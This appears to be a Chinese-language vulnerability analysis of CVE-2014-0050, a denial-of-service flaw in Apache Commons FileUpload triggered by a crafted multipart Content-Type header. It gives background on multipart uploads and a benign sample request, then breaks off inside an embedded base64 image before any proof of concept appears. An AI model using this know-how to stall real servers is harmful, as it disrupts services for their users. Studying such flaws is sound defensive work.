catalog

. Description

. Analysis

. POC

. Solution

1. Description

MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions
Apache Tomcat和JBoss Web中使用的Apache Commons FileUpload 1.3.1及之前版本中的MultipartStream.java文件存在安全漏洞。远程攻击者可借助特制的Content-Type header利用该漏洞造成拒绝服务(无限循环和CPU消耗)

Relevant Link:

http://cve.scap.org.cn/CVE-2014-0050.html

https://www.rapid7.com/db/vulnerabilities/apache-tomcat-cve-2014-0050

http://www.cnblogs.com/geekcui/p/3599425.html

2. Analysis

在最初的 http 协议中,没有上传文件方面的功能。 rfc1867 (http://www.ietf.org/rfc/rfc1867.txt) 为 http 协议添加了这个功能。客户端的浏览器,如 Microsoft IE, Mozila, Opera 等,按照此规范将用户指定的文件发送到服务器。服务器端的网页程序,如 php, asp, jsp 等,可以按照此规范,解析出用户发送来的文件
一个典型的multipart/form-data文件上传包格式如下

POST /upload_file/UploadFile HTTP/1.1

Accept: text/plain, */*

Accept-Language: zh-cn

Host: 192.168.29.65:80

Content-Type:multipart/form-data;boundary=---------------------------7d33a816d302b6

User-Agent: Mozilla/4.0 (compatible; OpenOffice.org)

Content-Length: 424

Connection: Keep-Alive -----------------------------7d33a816d302b6

Content-Disposition:form-data;

name="userfile1";

filename="E:\s"Content-Type:

application/octet-stream abbXXXccc

-----------------------------7d33a816d302b6 

Content-Disposition: form-data; 

name="text1" foo 

-----------------------------7d33a816d302b6 

Content-Disposition: form-data; 

name="password1" bar 

-----------------------------7d33a816d302b6--

可以看到,在multipart/form-data流中使用boundary进行分段,而boundary的具体内容在HTTP头部中给出

0x1: 漏洞代码分析

/commons/proper/fileupload/trunk/src/main/java/org/apache/commons/fileupload/MultipartStream.java

aaarticlea/png;base64,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